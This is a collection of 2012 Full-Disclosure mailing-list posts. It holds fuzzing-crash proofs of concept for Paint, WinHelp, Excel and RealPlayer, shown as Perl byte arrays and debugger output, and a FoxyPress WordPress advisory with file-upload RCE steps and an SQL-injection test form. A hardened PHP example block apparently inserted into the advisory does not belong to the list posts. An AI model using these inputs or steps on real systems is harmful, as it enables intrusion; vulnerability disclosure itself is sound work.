Re: [Full-disclosure] Microsoft Paint 5.1 memory corruption
Antony, if u wanna do my homework I suggest you find the offset that causes the crash, change some bytes and play with it; come back when there is no second chance, the instruction is not valid and it references invalid data, instead of spamming.

On Sat, Oct 27, 2012 at 3:14 PM, kaveh ghaemmaghami <kavehghaemmagh...@googlemail.com> wrote:
> Hello list!
> I want to warn you about Microsoft Paint 5.1 memory corruption
> Be safe
> Kaveh Ghaemmaghami aka (coolkaveh)
> --
> #!/usr/bin/perl
> #Title: Microsoft Paint 5.1 memory corruption
> #Version : build 2600.xpsp Service Pack3
> #Date : 2012-10-21
> #Vendor : http://www.microsoft.com
> #Impact : Med/High
> #Contact : coolkaveh [at] rocketmail.com
> #Twitter : @coolkaveh
> #tested : XP SP3 ENG
> #Author : coolkaveh
> ###
> #Notice : for testing POC please run Microsoft Paint under a debugger and then open the POC file.
> #
> #Bug :
> #
> #Memory corruption during the handling of the bmp files a context-dependent attacker can execute arbitrary code.
> ###
> #(844.cc4): Break instruction exception - code 80000003 (first chance)
> #eax=7ffda000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
> #eip=7c90120e esp=00faffcc ebp=00fafff4 iopl=0 nv up ei pl zr na pe nc
> #cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
> #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll -
> #ntdll!DbgBreakPoint:
> #7c90120e cc              int 3
> #0:005> g
> #(844.e20): Access violation - code c0000005 (first chance)
> #First chance exceptions are reported before any exception handling.
> #This exception may be expected and handled.
> #eax=000cab68 ebx=00000000 ecx=00000276 edx=000009d8 esi=000d5589 edi=000cab68
> #eip=77f2f118 esp=0007ef30 ebp=0007efb0 iopl=0 nv up ei pl nz na po nc
> #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
> #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\GDI32.dll -
> #GDI32!DdEntry11+0x44:
> #77f2f118 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
> #0:000> k
> #*** ERROR: Module load completed but symbols could not be loaded for C:\WINDOWS\system32\mspaint.exe
> #ChildEBP RetAddr
> #WARNING: Stack unwind information not available. Following frames may be wrong.
> #0007efb0 0101235e GDI32!DdEntry11+0x44
> #0007f024 0100a666 mspaint+0x1235e
> #0007f04c 0102284e mspaint+0xa666
> #0007f07c 01022af6 mspaint+0x2284e
> #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\MFC42u.DLL -
> #0007f100 5f801bc5 mspaint+0x22af6
> #0007f120 5f801b36 MFC42u!Ordinal6370+0x22
> #0007f180 5f802f6c MFC42u!Ordinal1108+0x91
> #0007f1a4 5f810971 MFC42u!Ordinal5801+0x34
> #0007f210 5f81424a MFC42u!Ordinal3944+0x5b
> #0007f2b0 7c911066 MFC42u!Ordinal5190+0x14d
> #0007f2b4 7c9101bb ntdll!wcsncpy+0xb07
> #0007f2c8 7c910202 ntdll!RtlAllocateHeap+0x117
> #0007f2f4 7c910202 ntdll!RtlAllocateHeap+0x15e
> #0007f2f8 7c91017b ntdll!RtlAllocateHeap+0x15e
> #0007f2fc 7c9101bb ntdll!RtlAllocateHeap+0xd7
> #0007f300 00000000 ntdll!RtlAllocateHeap+0x117
> #
> my $poc = "\x42\x4D\x4E\x0A\x00\x00\x00\x00\x00\x00\xC7\xBD\x00\x00\x28\x00\x00\x00\x46\x00\x00\x00\x46\x00\x00" .
> "\x00\x01\x00\x04\x00\x00\x00\x00\x00\xD8\x09\x00\x00\xC4\x0E\x00\x00\xC4\x0E\x00\x00\x00\x00\x00\x00" .
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x00\x00\x00\x80\x80\x00\x80\x00\x00\x00\x80" .
> "\x00\x80\x00\x80\x80\x00\x00\x80\x80\x80\x00\xC0\xC0\xC0\x00\x00\x00\xFF\x00\x00\xFF\x00\x00\x00\xFF" .
> "\xFF\x00\xFF\x00\x00\x00\xFF\x00\xFF\x00\xFF\xFF\x00\x00\xFF\xFF\xFF\x00\x88\x88\x88\x88\x88\x88\x88" .
> "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x77\x88\x87\x78\x88\x88\x88\x88\x87\x88\x88\x88\x88\x88" .
> "\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\xFF\xFF\x88\x88\x88\x88\x88\xFF\x87\x70\x77\x71" .
> "\x77\x77\x77\x77\x77\x72\x78\x88\x77\x07\x88\x77\x77\x78\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF" .
> "\xFF\xFF\xFF\xFF\x88\x8F\xF8\xFF\xFF\x7F\xFF\xF7\x8F\x07\xF7\x8F\xF8\x07\x88\xFF\xF0\x78\xFF\x87\x77" .
> "\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\x88\xFF\x88\x8F\xFF\xFF\x8F\xF8\x87\x8F\x7F" .
> "\xF7\xFF\x8F\x80\x8F\xFF\xF7\x8F\xF8\xFF\x07\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xF8" .
> "\x8F\xF8\x88\x8F\xFF\x77\x8F\xF8\x84\x8F\xFF\xF7\xFF\x08\xF7\xFF\x7F\xF7\xFF\x47\x8F\x76\x00\x88\x88" .
Re: [Full-disclosure] Microsoft Paint 5.1 memory corruption
Sir yes Sir.

On Tue, Oct 30, 2012 at 2:53 AM, kaveh ghaemmaghami <kavehghaemmagh...@googlemail.com> wrote:
> Antony, if u wanna do my homework I suggest you find the offset that causes the crash, change some bytes and play with it; come back when there is no second chance, the instruction is not valid and it references invalid data, instead of spamming.
>
> On Sat, Oct 27, 2012 at 3:14 PM, kaveh ghaemmaghami <kavehghaemmagh...@googlemail.com> wrote:
>> Hello list!
>> I want to warn you about Microsoft Paint 5.1 memory corruption
>> Be safe
>> Kaveh Ghaemmaghami aka (coolkaveh)
[Full-disclosure] RealPlayer 15.0.6.14(.3g2) WriteAV Vulnerability
Hello List
i want to warn u about RealPlayer 15.0.6.14 memory corruption during the handling of the 3g2 files
look what awesome coolkaveh found
Lets kill that bug
Be safe
keep it priv8

Title: RealPlayer 15.0.6.14(.3g2) WriteAV Vulnerability
Version : 15.0.6.14
Date : 2012-10-29
Vendor : http://www.real.com/
crash: http://img543.imageshack.us/img543/9130/pocm.jpg
Impact : High
Contact : coolkaveh [at] rocketmail.com
Twitter : @coolkaveh
tested : windows 7 x64
Author : coolkaveh
###
Bug :
Memory corruption during the handling of the 3g2 files context-dependent
Successful exploits can allow attackers to execute arbitrary code

(f84.8c8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=040d1370 ebx=7fdfe2d0 ecx=0a67f798 edx=0a67f7a8 esi=00000000 edi=00000004
eip=66fc94df esp=3c6c1a80 ebp=0a67f764 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Real\RealPlayer\codecs\dmp4.dll -
dmp4!GetGUID+0x1836f:
66fc94df 8944241c        mov dword ptr [esp+1Ch],eax ss:002b:3c6c1a9c=????????
0:029> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x3c6c1a9c
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation
Exception Hash (Major/Minor): 0x247c7f22.0x247c7f63
Stack Trace:
dmp4!GetGUID+0x1836f
Instruction Address: 0x66fc94df
Description: User Mode Write AV
Short Description: WriteAV
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at dmp4!GetGUID+0x0001836f (Hash=0x247c7f22.0x247c7f63)
User mode write access violations that are not near NULL are exploitable.

Proof of concept included.
http://www21.zippyshare.com/v/83302158/file.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Context IS Advisory - Citrix XenServer Hypervisor Privilege Escalation
===ADVISORY===
Systems Affected: Citrix XenServer 5.0 through 6.0.2
Severity: High
Category: Privilege Escalation
Author: Context Information Security
Reported to vendor: 24th May 2012
Advisory Issued: 30th October 2012
Reference: CVE-2012-4606
===ADVISORY===

Description
-----------
The XenServer remote VNC terminal emulator contains a vulnerability which would allow a user of a guest VM to get code executing in the hypervisor, leading to elevation of privilege on the server on which the guest VM was being hosted.

Analysis
--------
Citrix XenServer is distributed with a VT100 terminal emulator which is exposed via the VNC protocol to allow a remote user to administer their hosted para-virtualised machine. The application does not correctly handle certain escape sequences, which can lead to an unprivileged guest VM being able to gain code execution in the fully privileged Dom0, allowing the entire hosting server to be controlled.

It should be noted that the vulnerable code was also used in the QEMU-KVM terminal that can be used by emulated virtual machines; this is under a different CVE, CVE-2012-3515.

Technologies Affected
---------------------
Citrix XenServer 6.0
Citrix XenServer 5.6
Citrix XenServer 5.5
Citrix XenServer 5.0

Vendor Response
---------------
Vendor issued a security hot fix on the 5th September 2012. See http://support.citrix.com/article/CTX134708 for support information and download locations for different versions of XenServer.

Disclosure Timeline
-------------------
24th May 2012 – Vendor notified
5th September 2012 – Vendor issues fix

Credits
-------
James Forshaw of Context Information Security

About Context Information Security
----------------------------------
Context Information Security is an independent security consultancy specialising in both technical security and information assurance services. The company was founded in 1998. Its client base has grown steadily over the years, thanks in large part to personal recommendations from existing clients who value us as business partners.

We believe our success is based on the value our clients place on our product-agnostic, holistic approach; the way we work closely with them to develop a tailored service; and to the independence, integrity and technical skills of our consultants. The company's client base now includes some of the most prestigious blue chip companies in the world, as well as government organisations.

The best security experts need to bring a broad portfolio of skills to the job, so Context has always sought to recruit staff with extensive business experience as well as technical expertise. Our aim is to provide effective and practical solutions, advice and support: when we report back to clients we always communicate our findings and recommendations in plain terms at a business level as well as in the form of an in-depth technical report.

Web: www.contextis.com
Email: disclos...@contextis.co.uk
Re: [Full-disclosure] Microsoft Office Excel 2010 memory corruption
is the GNAA he's referring to the same trolls we all know and love?

On Oct 29, 2012 6:02 PM, "Jeffrey Walton" <noloa...@gmail.com> wrote:
> On Mon, Oct 29, 2012 at 5:54 PM, Peter Ferrie <peter.fer...@gmail.com> wrote:
>>>> No, it costs a lot of time and money to fix even one issue. We don't want to waste it on something that isn't exploitable.
>>> There are at least four problems with this argument. First, the argument basically says defective software is OK.
>> You've interpreted "don't want to waste it" as "won't fix it", extended it to suggest that it's an acceptable response, and then proceeded to attack that conclusion. Do you call the fire brigade if you see the smoke from a candle? No, but you might get someone in eventually to clean the soot from the ceiling.
> Secure is an immigrant property of the system (http://www.mail-archive.com/sc-l@securecoding.org/msg03639.html). How can the program be secure if it's not even stable?
>
> Worst, it's CompSci 101 mistakes - lack of parameter validation and failure to check return values - and not some clever attack. To add insult to injury, compiler warnings, static analysis and dynamic analysis will often report the issues but they are not used or ignored.
>
> Jeff
Re: [Full-disclosure] Microsoft Office Excel 2010 memory corruption
What tool and method are you using to spot all these bugs at ms products?

On Mon, Oct 29, 2012 at 1:12 PM, kaveh ghaemmaghami <kavehghaemmagh...@googlemail.com> wrote:
> thank you Jeff
> please tell me this is not exploitable
> http://www.exploit-db.com/exploits/22237/
> --
> all the crashes which i gave, i know, are not that easy to exploit; i just wanted to prove how easy it is to crash MS and i wanted to know MS's opinion about any flaws, so i am not going to give any crashes for free as far as i can sell them to ZDI which i know is exploitable, or i can exploit it for proof of concept.
> And i will leave the other crashes to the exploit dev experts and crash analyzers to exploit and enjoy the flaws.
> thank you everyone for sharing
> Best Regards
>
> On Mon, Oct 29, 2012 at 5:47 AM, kaveh ghaemmaghami <kavehghaemmagh...@googlemail.com> wrote:
>> Hello list
>> Dear Peter and others please take a look @ it
>> Best Regards
>> Kaveh Ghaemmaghami
>>
>> Title : Microsoft Office Excel 2010 memory corruption
>> Version : Microsoft Office professional Plus 2010
>> Date : 2012-10-27
>> Vendor: http://office.microsoft.com
>> Impact: Med/High
>> Contact : coolkaveh [at] rocketmail.com
>> Twitter : @coolkaveh
>> tested: XP SP3 ENG
>> ###
>> Bug :
>> memory corruption during the handling of the xls files a context-dependent attacker can execute arbitrary code (need investigate)
>>
>> (b4c.1350): Access violation - code c0000005 (first chance)
>> First chance exceptions are reported before any exception handling.
>> This exception may be expected and handled.
>> eax=00000584 ebx=00135070 ecx=00001000 edx=0000105f esi=06a80800 edi=00000040
>> eip=301ce0d0 esp=001302f0 ebp=00131d6c iopl=0 nv up ei pl zr na pe nc
>> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
>> *** ERROR: Symbol file could not be found. Defaulted to export symbols for Excel.exe -
>> Excel!Ordinal40+0x1ce0d0:
>> 301ce0d0 668b5008        mov dx,word ptr [eax+8] ds:0023:0000058c=????
>>
>> Proof of concept included.
>> http://www36.zippyshare.com/v/48422905/file.html
Re: [Full-disclosure] Microsoft Office Excel 2010 memory corruption
On 30 October 2012 03:31, Kelvin White <kelvin.whit...@gmail.com> wrote:
> is the GNAA he's referring to the same trolls we all know and love?

could there be any other?

mike
Re: [Full-disclosure] Microsoft Windows Help program (WinHlp32.exe) memory corruption
I was looking and it appears that this bug was fixed a long time ago at MS; also Windows Help (.hlp) files do not appear to be automatically opened in Windows Vista and later.

On Sat, Oct 27, 2012 at 2:38 PM, Gynvael Coldwind <gynv...@coldwind.pl> wrote:
> Hi Kaveh,
>
> Mario has a point. Why do you care about any bug in winhlp if by design you can embed a DLL file in the .hlp file and run arbitrary code? See e.g. Wikipedia http://en.wikipedia.org/wiki/WinHelp#WinHelp_appearance_and_features: "A rather security critical feature is that one can also include a DLL file containing custom code and associating it with WinHelp topics. Effectively this makes .HLP files equivalent to executables."
>
> There is no sense in finding bugs in WinHlp32.exe - it already is known that hlp=exe, by design.
>
> On Sat, Oct 27, 2012 at 9:55 AM, kaveh ghaemmaghami <kavehghaemmagh...@googlemail.com> wrote:
>> Hi Dear Sir,
>> I have reached 12 crashes during Microsoft Windows Help program test.
>> I can discuss with authority responsible
>> Best Regards
>>
>> On Sat, Oct 27, 2012 at 2:45 PM, kaveh ghaemmaghami <kavehghaemmagh...@googlemail.com> wrote:
>>> Hello list!
>>> I want to warn you about Microsoft Windows Help program (WinHlp32.exe) memory corruption
>>> Best Regards
>>> Kaveh Ghaemmaghami aka (coolkaveh)
>>> -
>>> #!/usr/bin/perl
>>> #Title: Microsoft Windows Help program (WinHlp32.exe) memory corruption
>>> #Version : 5.1.2600
>>> #Date : 2012-10-21
>>> #Vendor : http://www.microsoft.com
>>> #Crash: http://img69.imageshack.us/img69/7652/helpview.jpg
>>> #Impact : Med/High
>>> #Contact : coolkaveh [at] rocketmail.com
>>> #Twitter : @coolkaveh
>>> #tested : XP SP3 ENG
>>> #Author : coolkaveh
>>> ###
>>> #Info :
>>> #
>>> #The HLP file is Microsoft Help file documentation for the Windows operating system or Windows programs.
>>> #The file contains documentation for the Windows operating system or Windows programs.
>>> #
>>> #Bug :
>>> #
>>> #Memory corruption during the handling of the hlp files by Microsoft Windows default
>>> #help viewer (WinHlp32.exe)
>>> #Successful exploits can allow attackers to execute arbitrary code
>>> ###
>>> #(f3c.e64): Access violation - code c0000005 (first chance)
>>> #First chance exceptions are reported before any exception handling.
>>> #This exception may be expected and handled.
>>> #eax=00000000 ebx=000a3d08 ecx=3fffeb6b edx=00000003 esi=000a8fa8 edi=000a9000
>>> #eip=77c47380 esp=0007f528 ebp=0007f530 iopl=0 nv up ei pl nz ac po nc
>>> #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212
>>> #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll -
>>> #msvcrt!memmove+0xd0:
>>> #77c47380 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
>>> #1:001> !exploitable -v
>>> #First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
>>> #Exception Sub-Type: Write Access Violation
>>> #Description: User Mode Write AV
>>> #Short Description: WriteAV
>>> #Exploitability Classification: EXPLOITABLE
>>> #Recommended Bug Title: Exploitable - User Mode Write AV starting at msvcrt!memmove+0x00d0 (Hash=0x613a0f0c.0x41551815)
>>> #User mode write access violations that are not near NULL are exploitable.
>>> ###
>>> my $poc = "\x3F\x5F\x03\x00\x95\x03\x00\x00\xFF\xFF\xFF\xFF\xB8\x11\x00\x00\x85\x03\x00\x00\x7C\x03\x00\x00\x00" .
>>> "\x6C\x03\x21\x00\x01\x00\xB6\x50\xAF\x36\x00\x00\x01\x00\x0D\x00\x57\x69\x6E\x64\x6F\x77\x73\x20\x32" .
>>> "\x30\x30\x30\x00\x03\x00\x04\x00\x00\x00\x00\x00\x02\x00\x25\x00\x57\x65\x64\x6E\x65\x73\x64\x61\x79" .
>>> "\x2C\x20\x4A\x61\x6E\x75\x61\x72\x79\x20\x32\x37\x2C\x20\x31\x39\x39\x39\x20\x30\x39\x3A\x34\x35\x3A" .
>>> "\x32\x36\x00\x04\x00\x05\x00\x43\x53\x28\x29\x00\x04\x00\x05\x00\x43\x53\x28\x29\x00\x06\x00\x5A\x00" .
>>> "\x7F\x0F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x72\x6F\x63\x34\x00\x00\x00\x00\x00\x00\x00\x00" .
>>> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
>>> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8D\x02\x66" .
>>> "\x00\x68\x01\x58\x02\x04\x00\xFF\xFF\xE2\x00\xC0\xC0\xC0\x00\x06\x00\x5A\x00\x7F\x0F\x00\x00\x00\x00" .
>>> "\x00\x00\x00\x00\x00\x00\x74\x72\x6F\x75\x62\x6C\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
>>> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
[Full-disclosure] Hack In Paris CFP 2013
Introduction
============

Since 2004, Sysdream and HZV have organized the Nuit du Hack event in Paris, France. After the success of this year with more than 1200 attendees, we are planning a more international and corporate event. Aiming to bring together security professionals and enthusiasts, Hack In Paris will focus on the latest advances in IT security.

Hack In Paris will be held at Disneyland Paris Conference Centre from June 17th to 21st of 2013. The Nuit Du Hack will take place from 22nd to 23rd of June 2013 at Disneyland Paris too. This place is easily accessible by train (15mn ride) from downtown Paris and airports.

Topics
======

The following list contains major topics the conference will cover. Please consider submitting even if the subject of your research or your topic is not listed here.

- Vulnerability research and exploitation
- Penetration testing and security assessment
- Malware analysis and new trends in malicious codes
- Forensics, IT crime & law enforcement
- Privacy issues: LOPPSI, HADOPI, ...
- Low-level hacking (console security & mobile devices)
- Risk management and ISO 27001
- BYOD
- Social Engineering

How to submit?
==============

Submissions should contain the following elements:

- The biography of each author
- A short description (abstract) of your presentation
- The summary of your research, including technical information, in particular novel research with regards to the state of the art
- An estimation of your expenses (trip and hotel)

Please send your proposal to cfp[at]hackinparis[dot]com.

Note: presentations will take about 45 minutes, including 5 to 10 minutes of questions. All submissions will be reviewed by our program committee. Authors will be notified upon acceptance of their talk.

Upcoming dates
==============

October 1 : CFP announced
February 22 : Submission deadline
March 4 : Notification sent to authors
March 5 : Program announcement
June 17-21 : Hack In Paris
June 22 : Nuit Du Hack

Trainings
=========

We are also looking for experienced professionals to give three days of trainings. Contact trainings[at]hackinparis[dot]com.

Contact & Social Media
======================

Contact : info[at]hackinparis[dot]com
Twitter : http://twitter.com/hackinparis
Facebook : http://www.facebook.com/pages/Hack-In-Paris/134611446603792
Linkedin : http://www.linkedin.com/groups?gid=3750882
Re: [Full-disclosure] Microsoft Office Excel 2010 memory corruption
On 30 October 2012 11:22, Julius Kivimäki <julius.kivim...@gmail.com> wrote:
> Greater Nashville Apartment Association http://www.nashvilleaptasn.org/
> Great North Air Ambulance http://www.greatnorthairambulance.co.uk/

ohSeven meight you young 'uns with your fancy dubyadubyadubya indexing and querying the subsequent dataset skills you got me but good!!!11!!!
[Full-disclosure] [waraxe-2012-SA#095] - Multiple Vulnerabilities in Wordpress FoxyPress Plugin
[waraxe-2012-SA#095] - Multiple Vulnerabilities in Wordpress FoxyPress Plugin
===============================================================================

Author: Janek Vind "waraxe"
Date: 30. October 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-95.html

Description of vulnerable target:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

FoxyPress is a FREE shopping cart and product management tool that integrates with FoxyCart's e-commerce solution to help you get your store up and running quickly and efficiently.

http://wordpress.org/extend/plugins/foxypress/

Affected version: 0.4.2.5

###
1. Arbitrary File Upload Vulnerability in "documenthandler.php"
###

Reasons: Missing security checks in file upload functionality
Attack vectors: Uploaded file
Preconditions: Logged in as admin with FoxyPress product editing privileges

Php script "documenthandler.php" line 14:
[ source code start ]--------------------------------------------------------
if (!empty($_FILES)) {
...
	$targetpath = ABSPATH . INVENTORY_DOWNLOADABLE_LOCAL_DIR;
...
	$newfilename = foxypress_GenerateNewFileName($fileExtension, $inventory_id, $targetpath, $prefix);
	$targetpath = $targetpath . $newfilename;
	if(move_uploaded_file($_FILES['Filedata']['tmp_name'], $targetpath))
[ source code end ]----------------------------------------------------------

As we can see above, there are no security checks against the uploaded file. As a result, an attacker is able to upload files with an arbitrary extension to the remote system. In the case of php files this vulnerability leads to RCE (Remote Code Execution).

Test:

1. Open product editing webpage:
http://localhost/wp342/wp-admin/post.php?post=43&action=edit
2. Look for "Digital Downloads". Insert some number into the input box below "Max Downloads allowed (if you need to override the main setting)".
3. There must be a "Browse Files" button (Flash-based). Choose the php file you want to upload.

We can observe AJAX in action and as a result a download link appears:
http://localhost/wp342/wp-content/inventory_downloadables/my_download_jw82ku0jz9_43.php

Opening that download link will execute the previously uploaded php file.

###
2. SQL Injection Vulnerability in "documenthandler.php"
###

Reasons: Insufficient sanitization of user-supplied data
Attack vectors: User-supplied POST parameter "prefix"
Preconditions: Logged in as admin with FoxyPress product editing privileges

Php script "documenthandler.php" line 14:
[ source code start ]--------------------------------------------------------
if (!empty($_FILES)) {
	$inventory_id = intval( $_POST['inventory_id'] );
	$downloadabletable = $_POST['prefix'];
...
	$query = "INSERT INTO " . $downloadabletable . " SET inventory_id='" . $inventory_id . "', filename='" . mysql_escape_string($newfilename) . "', maxdownloads= '" . mysql_escape_string($downloadablemaxdownloads) . "', status = 1";
	$wpdb->query($query);
[ source code end ]----------------------------------------------------------

We can see that the user-supplied POST parameter "prefix" is used in the subsequent SQL "INSERT INTO" query as the table name. There is no input data sanitization, therefore an attacker is able to insert arbitrary data into any table in the current database.

Test (parameter "security" must be valid):

-[ test code start ]-----------------------------------------------------------
<html><body><center>
<form action="http://localhost/wp342/wp-admin/admin-ajax.php?action=foxypress_download&security=844b64ce45" method="post" enctype="multipart/form-data">
<input type="file" name="Filedata">
<input type="hidden" name="downloadablemaxdownloads" value="1">
<input type="hidden" name="prefix" value="waraxe">
<input type="submit" value="Test">
</form>
</center></body></html>
--[ test code end ]------------------------------------------------------------

Result (Wordpress must be set to show SQL errors):

WordPress database error: [Table 'wp342.waraxe' doesn't exist]
INSERT INTO waraxe SET inventory_id='0', filename='downloadable_qga73aojs8_0.php', maxdownloads= '1', status = 1

###
3. SQL Injection Vulnerability in "foxypress-manage-emails.php"
###

Reasons: Insufficient sanitization of user-supplied data
Attack vectors: User-supplied GET parameter "id"
Preconditions: Logged in as admin with FoxyPress management privileges

Php script "foxypress-manage-emails.php" line 14:
[ source code start ]--------------------------------------------------------
function foxypress_manage_emails_page_load()
{
	global $wpdb;
	if(isset($_GET['mode'])
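The first two findings above share one root cause: a client-controlled value (the uploaded file's extension, the "prefix" POST parameter) reaches the filesystem or the SQL statement without being checked against anything. The handler below is an added example written for this advisory, not FoxyPress code, showing how the same upload-plus-INSERT path looks when both values are allowlisted first. It assumes the WordPress globals $wpdb and ABSPATH, the plugin's INVENTORY_DOWNLOADABLE_LOCAL_DIR constant from the snippet above, and the hypothetical allowlists FOXY_ALLOWED_EXT and FOXY_ALLOWED_TABLES; the nonce action and capability names are assumptions as well.

```php
<?php
// Added example (not FoxyPress code): hardened replacement for the upload
// and INSERT path of documenthandler.php. Assumes WordPress globals $wpdb
// and ABSPATH, the plugin constant INVENTORY_DOWNLOADABLE_LOCAL_DIR, and the
// two hypothetical allowlists below.

// Only these extensions may ever be written to the downloadables directory.
// Anything the web server would execute (php, phtml, ...) is excluded by
// construction: an allowlist, not a denylist.
const FOXY_ALLOWED_EXT = array('pdf', 'zip', 'mp3', 'epub', 'png', 'jpg');

// "prefix" selects a table, so it may only name a table this plugin owns
// (hypothetical names, relative to the WordPress table prefix).
const FOXY_ALLOWED_TABLES = array('foxypress_downloadables', 'foxypress_assets');

// Returns the validated lower-case extension, or false if it is not allowed.
function foxy_validate_upload_extension($original_name) {
    $ext = strtolower(pathinfo($original_name, PATHINFO_EXTENSION));
    if ($ext === '' || !in_array($ext, FOXY_ALLOWED_EXT, true)) {
        return false;
    }
    return $ext;
}

// Table names cannot be bound with $wpdb->prepare(), so an allowlist is the
// only safe way to let the client pick one. Returns the full table name or false.
function foxy_resolve_table($wpdb, $prefix_param) {
    if (!in_array($prefix_param, FOXY_ALLOWED_TABLES, true)) {
        return false;
    }
    return $wpdb->prefix . $prefix_param;
}

function foxy_handle_download_upload() {
    global $wpdb;

    // Nonce check (the "security" query argument seen in the test form) plus a
    // capability check; the nonce alone does not say who is allowed to upload.
    check_ajax_referer('foxypress_download', 'security');
    if (!current_user_can('edit_posts')) {
        wp_die('forbidden', '', array('response' => 403));
    }
    if (empty($_FILES['Filedata']) || !is_uploaded_file($_FILES['Filedata']['tmp_name'])) {
        wp_die('no file', '', array('response' => 400));
    }

    $ext = foxy_validate_upload_extension($_FILES['Filedata']['name']);
    if ($ext === false) {
        wp_die('file type not allowed', '', array('response' => 400));
    }
    $table = foxy_resolve_table($wpdb, isset($_POST['prefix']) ? $_POST['prefix'] : '');
    if ($table === false) {
        wp_die('bad table', '', array('response' => 400));
    }

    $inventory_id  = isset($_POST['inventory_id']) ? intval($_POST['inventory_id']) : 0;
    $max_downloads = isset($_POST['downloadablemaxdownloads']) ? intval($_POST['downloadablemaxdownloads']) : 0;

    // Server-generated name: random token plus the validated extension, so the
    // only client-influenced part of the stored path is the integer id.
    $newfilename = 'downloadable_' . bin2hex(random_bytes(8)) . '_' . $inventory_id . '.' . $ext;
    $targetdir   = rtrim(ABSPATH . INVENTORY_DOWNLOADABLE_LOCAL_DIR, '/') . '/';
    $targetpath  = $targetdir . $newfilename;

    if (!move_uploaded_file($_FILES['Filedata']['tmp_name'], $targetpath)) {
        wp_die('upload failed', '', array('response' => 500));
    }

    // The identifier was allowlisted above; the values are bound by prepare().
    $wpdb->query($wpdb->prepare(
        "INSERT INTO `$table` SET inventory_id = %d, filename = %s, maxdownloads = %d, status = 1",
        $inventory_id, $newfilename, $max_downloads
    ));
    wp_send_json_success(array('filename' => $newfilename));
}
```

The extension allowlist removes the RCE path described in finding 1 only if the downloadables directory is also configured so the web server never executes scripts there; a defence-in-depth rule such as denying PHP handlers for that directory belongs beside this code. For finding 2, note that mysql_escape_string() on the values would not have helped in the original, because the injection point is the table name, which no escaping function protects.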
Re: [Full-disclosure] RealPlayer 15.0.6.14(.3g2) WriteAV Vulnerability
You can be mistaken for a troller, that's for sure, but I know you're just very stupid.

On Tue, Oct 30, 2012 at 5:37 AM, kaveh ghaemmaghami <kavehghaemmagh...@googlemail.com> wrote:
> Hello List
> i want to warn u about RealPlayer 15.0.6.14 memory corruption during the handling of the 3g2 files
> look what awesome coolkaveh found
> Lets kill that bug
> Be safe
> keep it priv8
Re: [Full-disclosure] Full-Disclosure Digest, Vol 92, Issue 34 - 1. Microsoft Windows Help program (WinHlp32.exe) memory
Normal way of doing security research business (for normal people of course) is to inform the vendor and discuss the issue. I would not describe further steps as they are well-known.

Kaveh Ghaemmaghami aka (coolkaveh) is either driven by his/her ego or never read this list's posts. Or both.

Mikhail Utin, CISSP

-----Original Message-----
Today's Topics:
1. Microsoft Windows Help program (WinHlp32.exe) memory corruption (kaveh ghaemmaghami)
2. Microsoft Paint 5.1 memory corruption (kaveh ghaemmaghami)
**********
Hello list!
I want to warn you about Microsoft Windows Help program (WinHlp32.exe) memory corruption
Best Regards
Kaveh Ghaemmaghami aka (coolkaveh)
_________________________________
CONFIDENTIALITY NOTICE: This email communication and any attachments may contain confidential and privileged information for the use of the designated recipients named above. If you are not the intended recipient, you are hereby notified that you have received this communication in error and that any review, disclosure, dissemination, distribution or copying of it or its contents is prohibited. If you have received this communication in error, please reply to the sender immediately or by telephone at (617) 426-0600 and destroy all copies of this communication and any attachments. For further information regarding Commonwealth Care Alliance's privacy policy, please visit our Internet web site at http://www.commonwealthcare.org.
Re: [Full-disclosure] Full-Disclosure Digest, Vol 92, Issue 34 - 1. Microsoft Windows Help program (WinHlp32.exe) memory
Don't feed the trolls!

On Tue, Oct 30, 2012 at 11:21 AM, Mikhail A. Utin mu...@commonwealthcare.org wrote:
